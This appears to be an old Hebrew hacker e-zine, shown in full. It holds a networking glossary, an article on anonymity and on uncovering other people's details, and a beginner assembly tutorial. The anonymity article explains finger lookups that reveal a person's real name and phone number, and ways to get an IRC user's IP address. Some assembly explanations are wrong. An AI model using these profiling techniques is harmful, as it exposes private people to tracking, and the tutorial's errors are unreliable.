‫‪ - gateway‬שער גישור‪ ,‬יחידת הפלט של הראוטר ‪ ,‬משם יוצא המידע לא משנה באיזה דרך שידור‪.‬‬
‫משם הוא יוצא !‬
‫‪ - ping‬שולח פאקט למחשב מסויים שאומר למחשב להחזיר תשובה וכך בודק את זמן התגובה של‬
‫המחשב ורואה את מהירות החיבור בין שתיי המחשבים‪.‬‬
‫‪ - ftp - file transport protocol‬יישום זה מאפשר העברת קבצים בין מחשבים שונים ברשת‪.‬‬
‫‪ - email‬יישום הדואר האלקטרוני אשר מאפשר שליחת דואר אלקטרוני בכל רחבי רשת האינטרנט‪.‬‬
‫‪ - http‬תקן לדפי היפר טקסט אשר מוצגים באינטרנט‪)html( .‬‬
‫‪ - telnet‬יישום המאפשר חיבור כמסוף אל מחשב מרוחק ברשת‪.‬‬
‫‪ - irc‬פרוטוקול אשר מאפשר שיחה בין אנשים ברשת בזמן אמת‪.‬‬
‫‪ - packet‬קבוצת נתונים קצרה המשודרת ברשת ברצף‪ .‬מידע הזורם ברשת מפורק לפאקטים קטנים‬
‫(מנות‪ ,‬חבילות) על‬
‫מנת להקל על בקרת שגיאות‪ .‬פאקט בעצם מעביר מידע בין מחשבים‪.‬‬
‫‪ - baseband‬פס בסיס‪ ,‬בשיטה הזאת קיים פס תקשורת פיסי אשר מקשר בין שתי מערכות או יותר‪.‬‬
‫‪ - broadcast‬שידור של אות או אותות כלשהם‬
‫‪ - hub‬מכשיר אלקטרוני המכיל חיבוריי רשת רבים‪ .‬לכל אחד מהחיבוריפם ניתן לחבר מחשב בעזרת‬
‫כבלי רשת‪.‬‬
‫המכשיר מקבל אותות של מידע מהמחשבים שמבחורים ברשת ומעביר אותם למחשבים האחרים‬
‫או לכתובת יעד‬
‫אחרת לפי בקשת המידע‪.‬‬
‫‪ - modem‬מודם‪ ,‬חומרה אשר מאפשרת לך להתחבר לאינטרנט ע"י קו טלפון והגדרת פרוטוקולים‬
‫נכונים‪.‬‬
‫‪ - pptp = point - to - point - tunneling protocol‬מספק סקירה כללית של פרוטוקול תיעול נקודה‬
‫לנקודה‪.‬‬
‫‪ - backdoor‬שורות קוד שמישהו הכניס במכוון כדי לאפשר לעצמו (בד"כ) גישה למשהו על מחשב‬
‫אחר יותר בקלות‪..‬‬
‫לדוגמא קוד שיפתח פורט מסויים רק לאי פי מסויים ויתן לו לכתוב שם פקודות קבועות‬
‫שיבצעו‬
‫פעולה כלשהי לפי מה שמכין הבאקדור קבע‪.‬‬
‫לפעמים האקרים אשר מצאו את הבאקדור מנצלים את זה ומכינים כמה נוספים כדי שהפריצה‬
‫הבאה למערכת תהיה פשוטה יותר !‬
‫‪ - exploit‬ניצול של חורי אבטחה ‪ -‬קודים\דרכים לנצל חורי אבטחה במערכות ‪..‬‬
‫‪. - linux‬מערכת הפעלה המבוססת על יוניקס ‪ ,‬בעלת קוד פתוח וניתנת להורדה ולשימוש בחינם‬
‫‪ - firewall‬מערכת להגנה מפני גישה לא מורשת למחשב מקומי או רשת מקומית שמחוברת‬
‫לאינטרנט‪.‬‬
‫‪ - proxy‬שרת המוקם על ידי ספקי שירות (חברות אינטרנט‪ ,‬חברות גדולות וכו') למען לקוחותיו‬
‫ותפקידו ליצור‬
‫קשר עם מחשבים ברשת ולשלוף מהם מידע על פי בקשת הגולשים‪ .‬לשרת הפרוקסי חיבור מהיר‬
‫משל הגולש הממצוע עם המודם ולכן משמש כמקום מהיר בהרבה לקבלת קבצים ממנו‪.‬‬
‫אם הרבה אנשים מבקשים את אותו קובץ ‪ -‬הקובץ נשמר בשרת הפרוקסי‪ ,‬ובכך חוסך לגולשים‬
‫את ההמתנה‬
‫לקבלת המידע משרת האינטרנט המרוחק‪ .‬על שרתי פרוקסי יש גם הגנה ולכן הם יכולים לשמש‬
‫כפיירוול‬
‫אבל בר‪.‬‬
‫‪ - protocol‬סדר פקודות\הוראות מוסכמות ומאפשרות לתכנן מערכות בכל העולם שיבינו ויוכלו‬
‫לתקשר אחת עם השניה‪.‬‬
‫‪ - binary‬שפה המורכבת מ ‪ 1 ,0 -‬והמחשב מבין אותה‪ ,‬רק אותה‪.‬‬
‫‪ - )socket )hardware‬התקן אשר לתוכו אפשר לתקוע רכיב אלקטרוני ולשחררו ללא צורך בהלחמה‪.‬‬
‫‪ - )socket )software‬כדיי שתוכנה תוכל לתקשר עם מחשב אחר עליה ליצור קשר דרך סוקט‪ ,‬התוכנה‬
‫מבצעת‬
‫פתיחה של סוקט לתוך סוקט שפתוח כשרת על מחשב אחר ויוצרת חיבור בין המחשבים‬
‫ומעבירה פאקטים בינהם‪.‬‬
‫‪ - compiler‬מחולל שינוי במה שכתבת בשפה תכנות כלשהי והופך את זה לשפת מחשב‪ ,‬בינארי ‪.‬‬
‫‪. by pirs[i]ng & rul3r‬‬

‫אנונימיות ‪ -‬אין להיות אנונימי ואיך לגלות דברים על אנשים אחרים‬
‫טוב כולכם אבל אני מדגיש כולכם ממש ממש ממש לא אנונימיים כל פעם שאתם מורידים קובץ‬
‫מאתר אז אנשי האתר יכולים (אם הם רוצים) לדעת עליכם ‪:‬‬
‫‪ip‬‬
‫‪isp‬‬
‫ארץ‬
‫עיר‬
‫סוג הדפדפן‬
‫‪os‬‬
‫רזולוציית מסך‬
‫ה ‪ url‬הקודם שביקרתם בו‬
‫עכשיו אתם בטח אומרים ‪ :‬נו אז מה למי איכפת שהאתר ידע מה רזולוציית המסך שלי‪...‬‬
‫אז אתם טועים ובגדול כי אם אתר מחורבן יכול לעשות את זה אז לאדם שקצת מתמצא בנושא אז זה‬
‫לא בעיה לגלות עליכם דברים הנה עוד דוגמא ‪:‬‬
‫במירס אפשר גם כן לגלות על מישהו הרבה דברים (במקרה הטוב הוא לא מסתיר את הדברים האלה)‬
‫שם אמיתי‬
‫כתובת‬
‫אי מייל‬
‫‪ip‬‬
‫‪isp‬‬
‫ארץ‬
‫עיר‬
‫אותו דבר גם במשחקי רשת ודברים כאלה‪....‬‬
‫נגיד אם יש לכם אי מייל של ה‬

‫‪isp‬‬
‫שלכם הנה דוגמא אם לא הבנתם‪:‬‬
‫‪muki@zahav.net.il‬‬
‫אז אתם יכולים להכנס ל‬

‫‪zahav.net.il‬‬
‫פורט‬
‫‪79‬‬
‫שזה פורט‬
‫‪finger‬‬
‫ושם אתם יכולים לגלות מלא על מוקי שלנו כמו שם אמיתי פעם אחרונה שהוא התחבר לפעמים‬
‫מספר טלפון אם יש לו אי מייל אחר‬
‫עכשיו אני לא יודע אם זה מקומי או כללי וורטקס אמר לי שזה מקומי והוא נתן לי הסבר מאוד‬
‫מאוד משכנע וסייבר פאנק ועוד איזה אחד אמרו לי שזה כללי ולא נתנו לי הסבר תחליטו לבד‪...‬‬
‫איפה הקאצ'‬
‫הנה יש מלא סרברים שחסמו את זה אבל אם זה באמת מקומים אז יש לכם יותר סיכוי להצליח‬
‫למצוא כי יש יותר‬
‫(יותר סרברים יותר סיכוי)‬
‫נכון זה נורא מעצבן אם אתם רוצים לדבר עם מישהו באיי סי קיו והוא יענו לא מחובר אבל יש לכם‬
‫הרגשה שהוא מתעלם ממכם אז אני מביא את הגאולה נכון יש תוכנה שמגלה אבל הרבה הרבה יותר‬
‫כיף לעשות דברים ידנית (אפילו לקרוא אי מייל) אם אתם יודעים את האי מייל שלו אז תכנסו לפינגר‬
‫שדיברתי עליו מקודם ותראו אם הוא באינטרנט או לא‬
‫מייל אנונימי‬
‫כל פעם שאתם מקבלים אי מייל אז אם תלחצו לחצן ימני על המייל ואז ‪ proparties‬אז תקבלו את ה‬
‫‪ ip‬של השולח אפילו אם תשלחו אי מייל מזוייף עם טלנט יראו את ה ‪ ip‬שלכם (זאת אחת הדרכים‬
‫לגלות אי מייל מזוייף)‬
‫שאלה‪ :‬איך עוקפים את זה?‬
‫אז יש ‪ remailer‬שזה כמו לינק אם שולחים ל נגיד ‪ muki@remailer.com‬אז זה אוטומטית מעביר‬
‫את הדואר ל ‪muki@zahav.net.il‬‬
‫זה טוב ויפה אבל מה קורה כשאתם רוצים לשלוח דואר אז יש שירותי ‪ remailer‬שזה כמו פרוקסי‬
‫אחרי השליחה רואים את ה‪ ip‬של ה‪ remailer‬ולא את שלכם‬
‫שאלה‪ :‬איך משתמשים בשירותי ‪ remailer‬לשליחת דואר אנונימי?‬
‫אז אתם נכנסים עם טלנט לשרת פורט ‪ 25‬מכניסים את השם משתמש והסיסמא (רישום חינם) ואז‬
‫משם אתם שולחים אם אתם לא בדיוק מבינים מה לעשות מקסימום תדברו איתי במירס‬
‫עוד שיטה לאי מייל אנונימי אבל זה סוג אחר של אנונימיות המטרה של זה שאחרים לא יקראו ולא‬
‫שלא יגלו אותך אז הנה השיטה‬
‫‪pgp‬‬
‫אם אתם לא יודעים מה זה תכנסו ל ‪ www.whatis.com‬ותחפשו שם (יש שם הסברים מצויינים‬
‫כמעט לכל דבר)‬
‫עוד על הדואר‬
‫שאלה‪ :‬איך אני מגלה אם הדואר שקיבלתי מזוייף או לא?‬

‫קודם כל יש את ה ‪ header‬כדי להכנס אליו לוחצים לחצן ימני על המכתב ‪ properties‬שם ב ‪details‬‬
‫זה בעצם ה ‪ header‬עכשיו אם הוא קצר (עשר שורות אבל כל שורה דיי קצרה) אז זה כבר מעלה חשד‬
‫עכשיו את תסתכלו ב ‪ header‬תראו שיש שם אנפורמציות דיי מענינות כמו האיי פי של השולח שרת‬
‫הדואר שממנו נשלח או שרת הדואר שמצויין אם זה באמת מזוייף אז זה השרת שהתחברו אליו‬
‫וממנו זייפו אז אם זיוף רציני על משהו חשוב אז החברה יכולה להסתכל בלוגים של השרת ולראות‬
‫לפי האיי פי שלכם (הוא כבר כתוב ב ‪ ) header‬מה בדיוק מה עשיתם אז נחזור לעניינינו איך מגלים‬
‫אם זה מזוייף‪ ,‬אז באי מייל אמיתי יש ‪ stmp id‬אם אין זה בטוח מזוייף אבל גם אם יש זה עדיין לא‬
‫מאה אחוז מזוייף עוד דבר יש תוכנה שאם מכניסים איי פי אז הוא אומר לך איזה ‪ isp‬זה אם תעשו‬
‫את זה אז זה ממש עוזר כי קיבלתם מייל מאנגליה ואתם חושדים שזה מזוייף תכנסו לתוכנה תכניסו‬
‫את ה ‪ ip‬ואם כתוב שזה נגיד אינטרנט זהב אז זה לא אנגליה‪...‬‬
‫האתר של התוכנה הזאת היא בסוף הטקסט בקטע של הלינקים‬
‫‪coockies‬‬
‫אני מניח שאתם כבר יודעים מה זה אז מה לעזאזל אני רוצה ממכם אז זהו שאם מישהו משיג את‬
‫הקוקיז שלכם לא הכי קשה להשיג אז יש לו סיכוי קטן אבל יש לפענח את ההצפנה של הקוקי במיוחד‬
‫אם זה אתר מחורבן‬
‫ועוד משהו אתרים יכולים לגלות עליכם הרבה יותר ממה שאתם חושבים רק על ידי שימוש בקוקיז‬
‫מסקנה‪ :‬כדאי למחוק אותם אבל לא צריך להיות יותר מידי פרנואידים‬
‫קבצים שמכילים פרטים עליכם‬
‫טוב אם אתם רוצים למחוק את כל הקבצים שמכילים פרטים עליכם כדאי שתשרפו את ההארד דיסק‬
‫אבל הנה דברים שאתם יכולים למחוק‬
‫קוקיז (בתיקייה של הקוקיז וב ‪ temporary internet files‬יש גם שם מלא קוקיז)‬
‫‪file0001.chk‬‬
‫‪file0001.chk‬‬
‫בדרך כלל נמצאים בכונן סי‬
‫‪mirc‬‬
‫אין כל כך הרבה מה לעשות או שיש ואני לא אומר‪ ): ...‬סתאאאאאם‬

‫אפשר בשרתים מסויימים להסתיר את האיי פי על ידי הפקודה הבאה‬
‫‪mode yournick +x/‬‬
‫לא בכל השרתים זה עובד‬
‫שאלה‪ :‬טוב ויפה אבל איך מגלים איי פי במירס זה מה שכולנו באמת רוצים לדעת‪...‬‬
‫אז אפשר לעשות‬
‫‪dcc chat‬‬
‫ואז לעשות ‪netstat‬‬
‫תאמינו לי עובד מצויין‬
‫או‬
‫‪dns/‬‬
‫יש שרטים שחוסמים את זה (רובם) בגלל זה השיטה שקודמת הרבה יותר טוב‬
‫אפשר גם במירס להכניס פרוקסי תבדקו באפשרויות של מירס ממש פשוט להכניס שם את הפרטים‬
‫‪icq‬‬
‫כדי להסתיר את האיי פי שלכם תעשו את הדברים הבאים‪:‬‬

‫כנסו ל ‪ preferences‬שם לכן ל ‪ connections‬שם תסמנו את ‪i'm using a permanent internet‬‬
‫‪)conection )lan‬‬
‫שם תסמנו את ‪ i am behind a fire-wall‬תסמנו את ‪ i am using a sock 4 proxy‬תלחצו ‪ next‬אחרי‬
‫זה הוא יבקש איי פי תתנו את האיי פי של הפרוקסי אחרי זה הוא ישאל אותכם על ‪sock port 4‬‬
‫תכתבו שם ‪ 4000‬אחרי זה תסמנו את ‪ open an outgoing upd port 4000 on my fire-wall‬תלחצו‬
‫‪ next‬אחרי זה תופיע ההודעה ‪ check my fire-wall/proxy conection‬חשוב מאוד להיות מחובר‬
‫לאינטרנט אבל לא לרשת ה ‪ icq‬זה חשוב מאוד‬
‫זהו‬
‫כדי להחזיר את המצב פשוט תחזרו למצב מודם רגיל בהגדרות‬
‫לינקים‬
‫‪ http://www.pgpi.com‬על הצפנה והצפנת האי מיילים שלכם‬
‫‪ http://www.cyberarmy.com/lists‬רשימה של פרוקסיז אנונימיים טובים‬
‫‪ http://www.multiproxy.org/anon_list.htm‬רשימה של פרוקסיז מצוווווינים (תודה לסינטאקס)‬
‫‪ - www.neotracer.com‬התוכנה שמאתרת איי אס פי‬
‫‪by ndr113‬‬
‫אסמבלר‬
‫מה זה אסמבלר בכלל ? בטוח שמעתם את השם הזה פעם או פעמיים בחיים אז אני יסביר מה זה ולמה זה‪.‬‬
‫מה בכתבה ?‬
‫• הסבר קצר על אסמבלר‬
‫• בסיסי ספירה‬
‫• המרה מבינארי לדצימלי‬
‫• אוגרים‬
‫•פקודות‬
‫הסבר‪.‬‬
‫אסמבלר היא שפת תכנות אשר לוקחת פקודות מחשב פשוטות והופכת אותם לחבילות של ביטים אשר עובדים‬
‫תחת אוגרים ומריצים את הפקודות שכתבתם בה בתור תוכנית‪.‬‬
‫אסמבלר היא שפת סף‪ ,‬היא לא שפה עלית כמו סי או ויז'ואל בייסיק‪.‬‬
‫‪ */‬הכוונה היא‪ c :‬לדוגמה היא שפת תכנות הגיונית‪ .‬אתם אומרים לה‬
‫‪printf‬‬
‫והיא מדפיסה משהו על המסך‪ .‬לעומתה אסמבלר זה הדבר הכי קרוב לשפת מכונה (אחרי שפה בינארית כמובן)‬
‫שאפשר לתכנת בו‪ .‬אם תסתכלו על קוד של אסמבלי לא תבינו מיד מה הוא עושה‪ ,‬אלא תצטרכו לעקוב‪ ,‬לחשוב‪,‬‬
‫להסתכל ולנסות להבין מה בדיוק דוחפים למחסנית ולמה כשעושים‬
‫‪push %eax‬‬
‫לדוגמה‪ .‬בלאדי‪/* .‬‬
‫נתחיל את כל הלמידה שלנו ממשהו פשוט‪:‬‬
‫בסיסי ספירה‪.‬‬
‫(בינארי (בסיס ‪2‬‬ ‫(אוקטאלי (בסיס ‪8‬‬ ‫(דצימלי (בסיס ‪10‬‬ ‫(הקסדצימלי (בסיס ‪16‬‬
‫‪0000‬‬ ‫‪0‬‬ ‫‪0‬‬ ‫‪0‬‬
‫‪0001‬‬ ‫‪1‬‬ ‫‪1‬‬ ‫‪1‬‬
‫‪0010‬‬ ‫‪2‬‬ ‫‪2‬‬ ‫‪2‬‬
‫‪0011‬‬ ‫‪3‬‬ ‫‪3‬‬ ‫‪3‬‬
‫‪0100‬‬ ‫‪4‬‬ ‫‪4‬‬ ‫‪4‬‬
‫‪0101‬‬ ‫‪5‬‬ ‫‪5‬‬ ‫‪5‬‬
‫‪0110‬‬ ‫‪6‬‬ ‫‪6‬‬ ‫‪6‬‬
‫‪0111‬‬ ‫‪7‬‬ ‫‪7‬‬ ‫‪7‬‬
‫‪1000‬‬ ‫‪-------------------‬‬ ‫‪8‬‬ ‫‪8‬‬
‫‪1001‬‬ ‫‪-------------------‬‬ ‫‪9‬‬ ‫‪9‬‬
‫‪1010‬‬ ‫‪-------------------‬‬ ‫‪10‬‬ ‫‪a‬‬
‫‪1011‬‬ ‫‪-------------------‬‬ ‫‪11‬‬ ‫‪b‬‬
‫‪1100‬‬ ‫‪-------------------‬‬ ‫‪12‬‬ ‫‪c‬‬
‫‪1101‬‬ ‫‪-------------------‬‬ ‫‪13‬‬ ‫‪d‬‬
‫‪1110‬‬ ‫‪-------------------‬‬ ‫‪14‬‬ ‫‪e‬‬
‫‪1111‬‬ ‫‪-------------------‬‬ ‫‪15‬‬ ‫‪f‬‬
‫כמה דברים שכדאי לזכור !!!‬
‫‪.1‬בסיס בינארי מתאפיין רק בשני מספרים‪ 0 ,‬ואחד‪.‬‬
‫‪.2‬במספרים בינארי יש דבר שנקרא אפס מוביל‪ ,‬למשל אתה צריכים מילה בינארית למילת מחשב בת ‪ 7‬אותיות‬
‫אבל מספר הבינארי שלכם הוא ‪ 6‬אותיות אז אתם יכולים להוסיף אפס משמאל והמחשב מתייחס אליו‬
‫כמו ל ‪ 0‬ואילו אם תוסיפו מצד שני‪ ,‬זה יהיה מספר אחר והמחשב לא יריץ את התוכנית הנכונה‪ .‬דוגמא‪:‬‬
‫‪ 6‬אותיות ‪ 7 , 1101010 -‬אותיות ‪ ,01101010 -‬שימו לב לאפס האדום שהוספתי‪.‬‬
‫‪ .3‬כל בסיס פרט לבינארי ימשיך את סדרת המספרים העולה עד למספר של הבסיס פחות אחד‪ ,‬דוגמא‪ ,‬בסיס‬
‫‪ 15‬יהיה מספר ‪ .0-14‬בסיס ‪ 99‬יהיה מספרים ‪.0-98‬‬
‫‪ .4‬הטבלה שלמעלה תעזור לכם להמיר מספר‪ ,‬אם אתם צריכים להמיר מספר ‪ 15‬באוקטלי למספר בדצימלי אז‬
‫מה עושים ?‬
‫לוקחים את ‪ 1‬שזה ‪ 0001‬ולוקחים את ‪ 5‬שזה ‪ 0101‬ומחברים‪ ,‬קיבלתם ‪ 000101010‬ועכשיו עושים המרה למספר‬
‫רגיל (דצימלי)‪ .‬והנה ההסבר איך להפוך מבינארי לעשרוני (דצימלי)‪.‬‬
‫המרה מבינארי לדצימלי‪:‬‬
‫איך אני הופך מבינארי לעשרוני‪.‬‬
‫הסבר ודוגמא‪:‬‬
‫ניקח את המספר ‪ ,00110011‬בחישוב מהיר הוא מסמל את המספר ‪.51‬‬
‫אוקי איך עשיתי את זה‪.‬‬
‫הנה היא הטבלה של הבינארי ‪ -‬במחשבים‪.‬‬
‫‪1‬‬ ‫‪2‬‬ ‫‪4‬‬ ‫‪8‬‬ ‫‪16‬‬ ‫‪32‬‬ ‫‪64‬‬ ‫‪128‬‬

‫נכניס את הבינארי מתחת‪.‬‬
‫‪1‬‬ ‫‪1‬‬ ‫‪0‬‬ ‫‪0‬‬ ‫‪1‬‬ ‫‪1‬‬ ‫‪0‬‬ ‫‪0‬‬
‫עכשיו אם יש מתחת לספרה האמיתית ‪ 0‬אז המספר שווה אפס אבל אם יש אחד אז הוא שווה כמה שכתוב מעל‬
‫ה‪.1‬‬
‫למשל‪:‬‬
‫יש אחד מעל האחד אז זוכרים ‪ ,1‬יש אחד מעל ה ‪ ,2‬זוכרים עוד ‪,2‬‬
‫וכו' עד שמגיעים ל‪.51 = 1+2+16+32 :‬‬
‫ברור ? אני אתן לכם פה תרגילים או שתיים‪:‬‬
‫‪? = 11001100‬‬
‫‪? = 00000010‬‬
‫בראשון אמור לצאת ‪.204‬‬
‫בשני אמור לצאת ‪.2‬‬
‫אני מקווה שהבנתם אם לא תקראו שוב כי זה לא ממש קשה‪.‬‬
‫עכשיו איך הופכים מעשרוני לבינארי? זה קצת יותר מסובך אבל עדיין נכנס להגדרה של קל‪.‬‬
‫ניקל את המספר ‪ 143‬ואז מה עושים ?‬
‫‪1‬‬ ‫‪2‬‬ ‫‪4‬‬ ‫‪8‬‬ ‫‪16‬‬ ‫‪32‬‬ ‫‪64‬‬ ‫‪128‬‬
‫יאללה בוא נתחיל‪ ,‬משמאל לימין‪,‬‬

‫האם ‪ 143‬נכנס בתיבה של ‪ ,128‬אם הוא גדול מ ‪ 128‬זה אומר שכן‪ ,‬אז נרשום שם אחד‪.‬‬
‫עכשיו נשאר לנו ‪.)143-128( 15‬‬
‫נמשיך‪ 15 ,‬נכנס ב ‪ ,64‬לא‪ .‬נכתוב שם אפס‪ ,‬האם ‪ 15‬נכנס ב ‪ ,32‬גם לא‪ ,‬נשאיר שם אפס‪.‬‬
‫‪ 15‬לא נכנס ב ‪ ,16 -‬אז נכתוב גם שם ‪.0‬‬
‫‪ 15‬נכנס ב ‪ ,8‬כן אז נכתוב שם אחד ונשאר לנו ‪. )15-8( 7‬‬
‫‪ 7‬נכנס ב ‪ ,4‬כן נכתוב אחד ונשאר לנו ‪)7-4( 3‬‬
‫‪ 3‬נכנס ב שתיים‪ ,‬כן נכתוב שם אחד ונשאר לנו אחד (‪.)3-2‬‬
‫ועכשיו נשאר אחד והוא מתאים בול לאחד בסוף אז גם שם נכתוב ‪.1‬‬
‫איזה בינארי יצא לנו ?‬
‫‪10001111‬‬
‫מקווה שהבנתם‪ ,‬אם לא‪ ,‬אז תחזרו על זה…‬
‫‪1‬‬ ‫‪2‬‬ ‫‪4‬‬ ‫‪8‬‬ ‫‪16‬‬ ‫‪32‬‬ ‫‪64‬‬ ‫‪128‬‬
‫‪1‬‬ ‫‪1‬‬ ‫‪1‬‬ ‫‪1‬‬ ‫‪0‬‬ ‫‪0‬‬ ‫‪0‬‬ ‫‪1‬‬
‫אוקי אז עכשיו תתרגלו את זה עד שתעשו את זה בלי דף נייר ובלי מחשבון (שזה הדרך הקלה)‪.‬‬
‫** הנה שיטה שתעשה לכם חיים קלים‪ ,‬אם צריכים להפוך מספר מבסיס ‪( x‬כל בסיס חוץ מבינארי) לבסיס‬
‫דצימלי (עשרוני) אז קודם עושים המרה לבינארי לפי הטבלה שלמעלה ואז מבינארי לעשרוני‪ ,‬תאמינו לי הכי‬
‫קל‪.‬‬
‫עכשיו… הייתי מעוניין להתחיל לדבר קצת על אוגרים‪.‬‬
‫אוגרים‪:‬‬
‫אוגרים הם בעצם תאי זיכרון בתוך המעבד‪ ,‬ישנם ‪ 4‬אוגרים כלליים שבד"כ מתכנתים באסמבלר משתמשים‬
‫בהם והם‪ ax, bx, cx, dx ,‬וישנו עוד אוגר ‪ ip‬אבל לא צריך אותו כרגע‪ ,‬נחזור אליו בעתיד‪.‬‬
‫כל אוגר הוא אוגר של ‪ 16‬סיביות‪ ,‬שניתן לחלקו לשני חלקים‪ ,‬כל חלק ‪ 8‬סיביות‪.‬‬
‫עכשיו מה הפרוש הפרקטי של כל אוגר ‪:‬‬
‫‪ax - accumulator‬‬
‫‪bx - base‬‬
‫‪cx - count‬‬
‫‪dx - data‬‬
‫‪ip - instruction pointer‬‬
‫‪ */‬פירסינג יקירי‪ ,‬שכחת לציין מה תפקידו של כל אוגר…‬
‫ככה‪ ax :‬משמש בד"כ לזכור ערכים‪ .‬ביצעתם פעולה חשבונית? אחסנתם מספר? זה בד"כ יהיה‬
‫מאוחסן באוגר הזה‪.‬‬
‫‪ bx‬אומר לפי איזה בסיס לבצע חישובים‪ .‬לא מעניין כרגע‪.‬‬
‫‪ cx‬הוא מונה‪ .‬אם יש לכם לופ ואתם צריכים מונה‪ ,‬תשתמשו באוגר הזה‪.‬‬
‫‪ dx‬גם לאחסון ערכים‪.‬‬
‫‪ ip‬זה אוגר מאוד מאוד חשוב‪ .‬לא מכניסים בו ערכים‪ .‬הוא משמש לציין איפה ההתחלה של התוכנית‬
‫שלכם‪ ,‬ז"א מאיפה להתחיל לבצע את ההוראות‪.‬‬
‫את כל האוגרים האלה ועוד הרבה הרבה אחרים תראו בעזרת תוכנת‬
‫‪ debug‬שבאה עם דוס‪ .‬כדי ללמוד איך להשתמש בתוכנה‪ ,‬פנו ל ‪ reference‬בסוף הטקסט הזה‪ .‬בלאדי‪.‬‬
‫*‪/‬‬
‫בואו נגיד שזהו אוגר ה ‪ ax‬שלנו‪ ,‬אני יסביר איך הוא בנוי‪.‬‬
‫‪15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0‬‬
‫‪15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0‬‬
‫האוגר שיותר למעלה‪ ,‬מראה לכם את ‪ ax‬במצב טבעי‪ ,‬כולל את כל ‪ 16‬הביטים שלו ואילו האוגר‬
‫שיותר למטה מחולק לשתיים‪ ,‬כל חלק ‪ 8‬ביט כמו שכתבתי למעלה‪.‬‬
‫ניתן לך תרשים של כל האוגרים שנשתמש בהם‪:‬‬
‫‪0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ax‬‬
‫‪0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 bx‬‬
‫‪0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 cx‬‬
‫‪0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 dx‬‬
‫אני בטוח ששמתם לב שאמרתי שיש ‪ 16‬ביטים בכל אוגר וכתוב רק ‪ ,15‬לאלה שלא הבינו למה‪ ,‬כמו‬
‫שאמרתי למעלה‪ ,‬באסמבלר עושים את כל הסדרה פחות ‪ 0( 1‬משומש כמו‪-‬כן)‪.‬‬
‫אוקי‪ ,‬אני מקווה שעד לפה אתם עוקבים ועכשיו הייתי רוצה לעבור לפקודות‪.‬‬
‫אוקי עכשיו עוד משהו‪ ,‬כל אוגר שמחולק לשתיים יקרא כך‬
‫| ‪ax -‬‬ ‫‪al‬‬ ‫|‬ ‫‪ah‬‬
‫‪ ah‬מסמל אוגר ‪ a-high‬ואילו ‪ al‬מסמל אוגר ‪.a-low‬‬
‫ככה כל אחד ואחד מהם‪ ,‬מ ‪ ax‬עד ל ‪.dx‬‬
‫‪ ax‬שווה ‪ 16‬סיביות‪ ,‬ואילו ‪ al‬שווה ‪ 8‬סיביות‪ ,‬חשוב מאוד לזכור את זה‪ ,‬קצת תרגול‪:‬‬
‫אני רושם אוגר או חלק מאוגר ואתם רושמים כמה סיביות יש בתוכו‪.‬‬
‫‪? = ax‬‬
‫‪? = bl‬‬
‫‪? = al‬‬
‫‪? = ch‬‬
‫‪? = dl‬‬
‫(תשובות בסדר יורד‪),16,8,8,8,8 ,‬‬
‫(* רמז‪ ,‬הראשון זה ‪).16‬‬
‫פקודות‪.‬‬
‫אני אתן פקודה‪ ,‬איך כותבים אותה ומה פירוש הפקודה‪.‬‬
‫לא לשכוח‪ ,‬יש פסיק אחרי כל שם של אוגר ולא לשכוח נקודה פסיק בסוף הפקודה (;)‪.‬‬
‫ברירת המחדל של הקומפלייר היא שונה בכל תוכנה ותוכנה יש כאלה שאצלם ברירת המחדל היא ‪,16‬‬
‫אז כל מספר שתכניס היא תחשיב אותו בבסיס ‪ 16‬וכדומה‪ ,‬אז בואו נגיד שכרגע ברירת המחדל שלנו‬
‫היא ‪ ,10‬בסיס דצימלי‪ ,‬עשרוני‪.‬‬
‫הדוגמא תהיה מסומנת באדום‪.‬‬
‫העתקה של ערך ‪mov -‬‬

‫צורה ‪mov op1, op2; -‬‬
‫(‪mov ax, 123; )ax123‬‬
‫פעולת חיבור בין שני ערכים ‪add -‬‬

‫צורה ‪add op1, op2; -‬‬
‫;‪mov ax, 12‬‬
‫;‪mov bx, 12‬‬
‫(‪add ax, bx; )ax  24‬‬
‫פעולת חיסור בין שני ערכים ‪sub -‬‬

‫צורה ‪sub op1, op2; -‬‬
‫;‪mov ax, 12‬‬
‫;‪mov bx, 12‬‬
‫(‪sub ax, bx; )ax  0‬‬
‫אני חושב שזה מספיק בינתיים‪ ,‬עכשיו אני אתן לכם כמה תרגילים ‪ ,‬תעבדו עליהם‪ ,‬תיישמו את מה‬
‫שלמדתם וניפגש בכתבה הבאה שלי‪ ,‬עד אז‪ ,‬יבוא שלום על ישראל‪.‬‬
‫האוגר ‪ ax‬קולט ערך ‪ ,12‬האוגר ‪ bx‬קולט ערך ‪ ,15‬האוגר ‪ cx‬קולט ערך ‪ 18‬ואז עושים חשבון בין כולם‪,‬‬
‫אוגר ‪ ax‬יהיה שווה ‪.45‬‬
‫אם לא תצליחו אז אני מוסיף בסוף העמוד את התשובה הנכונה‪:‬‬
‫להתראות ועד לפעם הבאה‪ ,‬שמרו על עצמכם‪pirsing ,‬‬
‫‪///////////////////‬‬
‫;‪mov ax, 12‬‬
‫;‪mov bx, 15‬‬
‫;‪mov cx, 18‬‬
‫;‪add ax, bx‬‬
‫;‪add ax, cx‬‬
‫‪///////////////////‬‬
‫‪:reference */‬‬
‫"המדריך לשפת אסמבלי" (הוצאת הוד עמי)‪ .‬יש שם המון זבל‪ ,‬אבל ה ‪ 10 -‬פרקים הראשונים‬
‫רלוונטיים לנו‪.‬‬
‫שמעתי על ספר מצויין בנושא של כותב ישראלי‪ ,‬לצערי אני לא זוכרת את השם‪ .‬אלי משהו‪ .‬‬
‫כמו כן‪ 2 ,‬מדריכים של פראק‪:‬‬

‫‪smashing the stack for fun and profit‬‬
‫‪win32 buffer overflows‬‬
‫הספר הראשון גם יציג לכם את תוכנת ‪ debug‬וכך תוכלו לנסות דוגמאות פשוטות כמו הדוגמאות‬
‫הנ"ל‪ .‬אין צורך להוריד תוכנת אסמבלר (לא קוראים לזה "קומפיילר"‪ ,‬כי זאת לא שפת עילית)‬
‫מורכבת כמו ‪ masm‬לצורך הזה‪.‬‬
‫בלאדי‪/* .‬‬
‫‪[[eof‬‬ ‫‪144-144-144-144-144‬‬ ‫]]‪eof‬‬
‫‪by blood runner‬‬

‫צרו קשר‬
‫שלום ‪.‬‬
‫הכל טוב ?‬
